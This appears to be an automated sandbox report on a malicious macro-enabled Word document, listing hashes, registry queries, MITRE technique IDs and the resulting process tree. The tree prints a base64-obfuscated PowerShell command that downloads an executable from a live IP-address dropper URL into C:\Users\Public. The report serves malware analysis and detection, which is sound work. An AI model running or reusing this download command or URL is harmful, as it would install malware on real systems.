1e7619ea43467167cade758f8d611b25d40c2a3e93ca541e6acfd4ede2c81b29

General

Target

1e7619ea43467167cade758f8d611b25d40c2a3e93ca541e6acfd4ede2c81b29.docm
Size

153KB
MD5

6d713af398101fb1ce7c6cd4831fd01e
SHA1

83be76755052d2a67ea1f07d4de4b937327e19fe
SHA256

1e7619ea43467167cade758f8d611b25d40c2a3e93ca541e6acfd4ede2c81b29
SHA512

2b0a9adafb002b3f2fb7f62fdee15572aa7883554b4780474aaaa1b2c82759c13ad3c6868f95c9399ee685094cb2b469b127f7fbf48567fb3f87b8ae178d7d3a

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://62.171.152.105/Hfhue723bhDSF9uyhfwe

Signatures

Process spawned unexpected child process 3 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.execmd.execmd.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process	4700	4052	cmd.exe	WINWORD.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process	4692	4052	cmd.exe	WINWORD.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process	2496	4052	cmd.exe	WINWORD.EXE

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

22 2160 powershell.exe

flow	pid	process
22	2160	powershell.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

Processes:

WINWORD.EXE

pid process

4052 WINWORD.EXE
4052 WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exe

pid process

2160 powershell.exe
2160 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 2160 powershell.exe
Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

WINWORD.EXE

pid process

4052 WINWORD.EXE
4052 WINWORD.EXE
4052 WINWORD.EXE
4052 WINWORD.EXE

pid	process
4052	WINWORD.EXE
4052	WINWORD.EXE

pid	process
2160	powershell.exe
2160	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2160	powershell.exe

pid	process
4052	WINWORD.EXE
4052	WINWORD.EXE
4052	WINWORD.EXE
4052	WINWORD.EXE

Suspicious use of WriteProcessMemory 14 IoCs

Processes:

WINWORD.EXEcmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 4052 wrote to memory of 4700	4052	WINWORD.EXE	cmd.exe
PID 4052 wrote to memory of 4700	4052	WINWORD.EXE	cmd.exe
PID 4700 wrote to memory of 4648	4700	cmd.exe	cmd.exe
PID 4700 wrote to memory of 4648	4700	cmd.exe	cmd.exe
PID 4052 wrote to memory of 4692	4052	WINWORD.EXE	cmd.exe
PID 4052 wrote to memory of 4692	4052	WINWORD.EXE	cmd.exe
PID 4052 wrote to memory of 2496	4052	WINWORD.EXE	cmd.exe
PID 4052 wrote to memory of 2496	4052	WINWORD.EXE	cmd.exe
PID 4692 wrote to memory of 2160	4692	cmd.exe	powershell.exe
PID 4692 wrote to memory of 2160	4692	cmd.exe	powershell.exe
PID 2496 wrote to memory of 4424	2496	cmd.exe	cmd.exe
PID 2496 wrote to memory of 4424	2496	cmd.exe	cmd.exe
PID 4424 wrote to memory of 720	4424	cmd.exe	choice.exe
PID 4424 wrote to memory of 720	4424	cmd.exe	choice.exe

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\1e7619ea43467167cade758f8d611b25d40c2a3e93ca541e6acfd4ede2c81b29.docm" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4052

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Public\hg32j.bat
2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4700

C:\Windows\system32\cmd.exe
cmd /c mkdir C:\Users\Public\kjh4ek
3⤵
PID:4648

C:\Windows\SYSTEM32\cmd.exe
cmd /C powershell -Command (New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('aHR0cDovLzYyLjE3MS4xNTIuMTA1L0hmaHVlNzIzYmhEU0Y5dXloZndl')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXGNhbGMuZXhl')))
2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4692

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command (New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('aHR0cDovLzYyLjE3MS4xNTIuMTA1L0hmaHVlNzIzYmhEU0Y5dXloZndl')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXGNhbGMuZXhl')))
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2160

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Public\kjh4ek\ndj34h.bat
2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2496

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /C choice /C Y /N /D Y /T 20
3⤵
- Suspicious use of WriteProcessMemory
PID:4424

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 20
4⤵
PID:720

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Public\hg32j.bat
Filesize
35B

MD5
a5da72ee0446ec6ccf16298d20de53d9

SHA1
d39910505712193c1058d77663d828f81075b7bf

SHA256
c6b36bf33bea0b0b636ccf415fbc9f99b66a0d8871883869bd0dbf6ee7508836

SHA512
12e33315a913ce92125f2805b9141ddad520818e73fb35f8be9d383b2642c137bbe4b8df770418e9a051f1a21f8d45aa4f242bfea933f4007488cb49f4922939

Download Submit
C:\Users\Public\kjh4ek\ndj34h.bat
Filesize
83B

MD5
b95ea117e4f9873b9016c76c31a2f572

SHA1
b54c86c8d1418b5cfc75fd4f75292ffc040cb4ad

SHA256
78e21ae946d4d531c82c859a58c6aa0e0f6c346a30d542be7c2079426ba6e177

SHA512
d58d157224fde457dc1e40d1cad7429da96bf49015e1d6cbf2d1dd4085cd2ba723cfd439960922522942603f7f12879e76b4644160bec688f911224fd44f5b83

Download Submit
memory/720-146-0x0000000000000000-mapping.dmp

Download
memory/2160-148-0x00007FF9D0FA0000-0x00007FF9D1A61000-memory.dmp

Filesize
10.8MB

Download
memory/2160-147-0x0000022F68900000-0x0000022F68922000-memory.dmp

Filesize
136KB

Download
memory/2160-143-0x0000000000000000-mapping.dmp

Download
memory/2496-142-0x0000000000000000-mapping.dmp

Download
memory/4052-135-0x00007FF9BA220000-0x00007FF9BA230000-memory.dmp

Filesize
64KB

Download
memory/4052-150-0x00007FF9BC5B0000-0x00007FF9BC5C0000-memory.dmp

Filesize
64KB

Download
memory/4052-137-0x000002738A020000-0x000002738A024000-memory.dmp

Filesize
16KB

Download
memory/4052-152-0x00007FF9BC5B0000-0x00007FF9BC5C0000-memory.dmp

Filesize
64KB

Download
memory/4052-153-0x00007FF9BC5B0000-0x00007FF9BC5C0000-memory.dmp

Filesize
64KB

Download
memory/4052-136-0x00007FF9BA220000-0x00007FF9BA230000-memory.dmp

Filesize
64KB

Download
memory/4052-130-0x00007FF9BC5B0000-0x00007FF9BC5C0000-memory.dmp

Filesize
64KB

Download
memory/4052-151-0x00007FF9BC5B0000-0x00007FF9BC5C0000-memory.dmp

Filesize
64KB

Download
memory/4052-134-0x00007FF9BC5B0000-0x00007FF9BC5C0000-memory.dmp

Filesize
64KB

Download
memory/4052-133-0x00007FF9BC5B0000-0x00007FF9BC5C0000-memory.dmp

Filesize
64KB

Download
memory/4052-132-0x00007FF9BC5B0000-0x00007FF9BC5C0000-memory.dmp

Filesize
64KB

Download
memory/4052-131-0x00007FF9BC5B0000-0x00007FF9BC5C0000-memory.dmp

Filesize
64KB

Download
memory/4424-145-0x0000000000000000-mapping.dmp

Download
memory/4648-140-0x0000000000000000-mapping.dmp

Download
memory/4692-141-0x0000000000000000-mapping.dmp

Download
memory/4700-138-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads